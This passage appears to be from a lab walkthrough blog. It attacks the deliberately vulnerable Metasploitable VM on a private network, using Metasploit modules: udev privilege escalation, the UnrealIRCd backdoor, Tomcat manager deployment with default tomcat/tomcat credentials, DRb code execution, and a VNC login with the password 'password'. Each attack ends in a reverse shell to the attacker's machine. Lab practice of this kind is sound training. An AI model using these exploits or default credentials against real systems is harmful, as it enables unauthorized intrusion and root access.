[*] Started reverse handler on 192.168.127.159:4444
[*] 192.168.127.154:5432 - PostgreSQL 8.3.1 on i486-pc-linux-gnu, compiled by GCC cc (GCC) 4.2.3 (Ubuntu 4.2.3-2ubuntu4)
[*] Uploaded as /tmp/uVhDfWDg.so, should be cleaned up automatically
[*] Transmitting intermediate stager for over-sized stage...(100 bytes)
[*] Sending stage (1228800 bytes) to 192.168.127.154
[*] Meterpreter session 1 opened (192.168.127.159:4444 -> 192.168.127.154:37141) at 2014-06-06 22:49:17 +0300

From here we again have to elevate our privileges. I will exploit the same vulnerability with the udev exploit, but this time from inside Metasploit:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
meterpreter > background
[*] Backgrounding session 1...
msf exploit(postgres_payload) > use exploit/linux/local/udev_netlink
msf exploit(udev_netlink) > show options

Module options (exploit/linux/local/udev_netlink):

Name Current Setting Required Description
---- --------------- -------- -----------
NetlinkPID no Usually udevd pid-1. Meterpreter sessions will autodetect
SESSION yes The session to run this module on.
WritableDir /tmp yes A directory where we can write files (must not be mounted noexec)


Exploit target:

Id Name
-- ----
0 Linux x86


msf exploit(udev_netlink) > set SESSION 1
SESSION => 1
msf exploit(udev_netlink) > exploit

[*] Started reverse handler on 192.168.127.159:4444
[*] Attempting to autodetect netlink pid...
[*] Meterpreter session, using get_processes to find netlink pid
[*] udev pid: 2770
[+] Found netlink pid: 2769
[*] Writing payload executable (274 bytes) to /tmp/rzIcSWveTb
[*] Writing exploit executable (1879 bytes) to /tmp/DQDnKUFLzR
[*] chmod'ing and running it...
[*] Command shell session 2 opened (192.168.127.159:4444 -> 192.168.127.154:33383) at 2014-06-06 23:03:13 +0300

whoami
root

So, the same exploit that I manually used earlier was very easy and quick in Metasploit. Onwards!

Port 5900 vnc

The Nessus scan reported that the server is using the password ‘password’. So I will use vncviewer to connect to it:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
vncviewer 192.168.127.154
Connected to RFB server, using protocol version 3.3
Performing standard VNC authentication
Password:
Authentication successful
Desktop name "root's X desktop (metasploitable:0)"
VNC server default format:
32 bits per pixel.
Least significant byte first in each pixel.
True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0
Using default colormap which is TrueColor. Pixel format:
32 bits per pixel.
Least significant byte first in each pixel.
True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0

vnc
And we have another root shell.

Port 6667 irc

An exploit is available for this:
UnrealIRCD 3.2.8.1 Backdoor Command Execution

This module exploits a malicious backdoor that was added to the Unreal IRCD 3.2.8.1 download archive. This backdoor was present in the Unreal3.2.8.1.tar.gz archive between November 2009 and June 12th 2010.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
msf > use exploit/unix/irc/unreal_ircd_3281_backdoor
msf exploit(unreal_ircd_3281_backdoor) > show options

Module options (exploit/unix/irc/unreal_ircd_3281_backdoor):

Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 6667 yes The target port


Exploit target:

Id Name
-- ----
0 Automatic Target


msf exploit(unreal_ircd_3281_backdoor) > set RHOST 192.168.127.154
RHOST => 192.168.127.154
msf exploit(unreal_ircd_3281_backdoor) > set payload cmd/unix/reverse
payload => cmd/unix/reverse
msf exploit(unreal_ircd_3281_backdoor) > set LHOST 192.168.127.159
LHOST => 192.168.127.159
msf exploit(unreal_ircd_3281_backdoor) > exploit

[*] Started reverse double handler
[*] Connected to 192.168.127.154:6667...
:irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname...
:irc.Metasploitable.LAN NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead
[*] Sending backdoor command...
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo qcHh6jsH8rZghWdi;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "qcHh6jsH8rZghWdirn"
[*] Matching...
[*] A is input...
[*] Command shell session 3 opened (192.168.127.159:4444 -> 192.168.127.154:41975) at 2014-06-06 23:31:44 +0300

whoami
root

Port 8180 tomcat

First, let’s see what information we can get using the Tomcat Administration Tool Default Access module:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
msf > use auxiliary/admin/http/tomcat_administration
msf auxiliary(tomcat_administration) > show options

Module options (auxiliary/admin/http/tomcat_administration):

Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no Use a proxy chain
RHOSTS yes The target address range or CIDR identifier
RPORT 8180 yes The target port
THREADS 1 yes The number of concurrent threads
TOMCAT_PASS no The password for the specified username
TOMCAT_USER no The username to authenticate as
VHOST no HTTP server virtual host

msf auxiliary(tomcat_administration) > set RHOSTS 192.168.127.154
RHOSTS => 192.168.127.154
msf auxiliary(tomcat_administration) > run

[*] http://192.168.127.154:8180/admin [Apache-Coyote/1.1] [Apache Tomcat/5.5] [Tomcat Server Administration] [tomcat/tomcat]
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

With credentials in hand, now we can use the Apache Tomcat Manager Application Deployer Authenticated Code Execution exploit:

This module can be used to execute a payload on Apache Tomcat servers that have an exposed “manager” application. The payload is uploaded as a WAR archive containing a jsp application using a PUT request. The manager application can also be abused using /manager/html/upload, but that method is not implemented in > this module. NOTE: The compatible payload sets vary based on the selected target. For example, you must select the Windows target to use native Windows payloads.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
msf > use exploit/multi/http/tomcat_mgr_deploy
msf exploit(tomcat_mgr_deploy) > show options

Module options (exploit/multi/http/tomcat_mgr_deploy):

Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD no The password for the specified username
PATH /manager yes The URI path of the manager app (/deploy and /undeploy will be used)
Proxies no Use a proxy chain
RHOST yes The target address
RPORT 80 yes The target port
USERNAME no The username to authenticate as
VHOST no HTTP server virtual host


Exploit target:

Id Name
-- ----
0 Automatic


msf exploit(tomcat_mgr_deploy) > set PASSWORD tomcat
PASSWORD => tomcat
msf exploit(tomcat_mgr_deploy) > set RHOST 192.168.127.154
RHOST => 192.168.127.154
msf exploit(tomcat_mgr_deploy) > set USERNAME tomcat
USERNAME => tomcat
msf exploit(tomcat_mgr_deploy) > set PASSWORD tomcat
PASSWORD => tomcat
msf exploit(tomcat_mgr_deploy) > set RHOST 192.168.127.154
RHOST => 192.168.127.154
msf exploit(tomcat_mgr_deploy) > set USERNAME tomcat
USERNAME => tomcat
msf exploit(tomcat_mgr_deploy) > set RPORT 8180
RPORT => 8180
msf exploit(tomcat_mgr_deploy) > set payload java/meterpreter/reverse_tcp
payload => java/meterpreter/reverse_tcp
msf exploit(tomcat_mgr_deploy) > set LHOST 192.168.127.159
LHOST => 192.168.127.159
msf exploit(tomcat_mgr_deploy) > exploit

[*] Started reverse handler on 192.168.127.159:8888
[*] Attempting to automatically select a target...
[*] Automatically selected target "Linux x86"
[*] Uploading 13833 bytes as RuoE02Uo7DeSsaVp7nmb79cq.war ...
[*] Executing /RuoE02Uo7DeSsaVp7nmb79cq/19CS3RJj.jsp...
[*] Undeploying RuoE02Uo7DeSsaVp7nmb79cq ...
[*] Command shell session 4 opened (192.168.127.159:8888 -> 192.168.127.154:33966) at 2014-06-06 23:51:01 +0300

whoami
tomcat55

We can elevate our privileges using the udev exploit from earlier, so I won’t go over it again.

Port 8787 drb

First I wanted to know what this drb is, since I wasn’t familiar with it.

Distributed Ruby or DRb allows Ruby programs to communicate with each other on the same machine or over a network. DRb uses remote method invocation (RMI) to pass commands and data between processes (Wikipedia)

Then I searched in Metasploit for an exploit, and luckily, I got a hit:
Distributed Ruby Send instance_eval/syscall Code Execution

This module exploits remote code execution vulnerabilities in dRuby

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
msf > use exploit/linux/misc/drb_remote_codeexec
msf exploit(drb_remote_codeexec) > show options

Module options (exploit/linux/misc/drb_remote_codeexec):

Name Current Setting Required Description
---- --------------- -------- -----------
URI yes The dRuby URI of the target host (druby://host:port)


Exploit target:

Id Name
-- ----
0 Automatic


msf exploit(drb_remote_codeexec) > set URI druby://192.168.127.154:8787
URI => druby://192.168.127.154:8787

msf exploit(drb_remote_codeexec) > set payload cmd/unix/reverse
payload => cmd/unix/reverse
msf exploit(drb_remote_codeexec) > set LHOST 192.168.127.159
LHOST => 192.168.127.159
msf exploit(drb_remote_codeexec) > exploit

[*] Started reverse double handler
[*] trying to exploit instance_eval
[*] instance eval failed, trying to exploit syscall
[-] Exploit failed: Errno::EINVAL Invalid argument
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo 7Kx3j4QvoI7LOU5z;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "7Kx3j4QvoI7LOU5zrn"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (192.168.127.159:4444 -> 192.168.127.154:35889) at 2014-06-08 16:51:56 +0300

whoami
root

Another port, another shell!
This turned out to be a a very lengthy post. There were some ports I couldn’t find an exploit for, so can’t determine if the underlying services were exploitable or not. Overall, owning Metasploitable in multiple ways and documenting it was the goal of this post.

Comments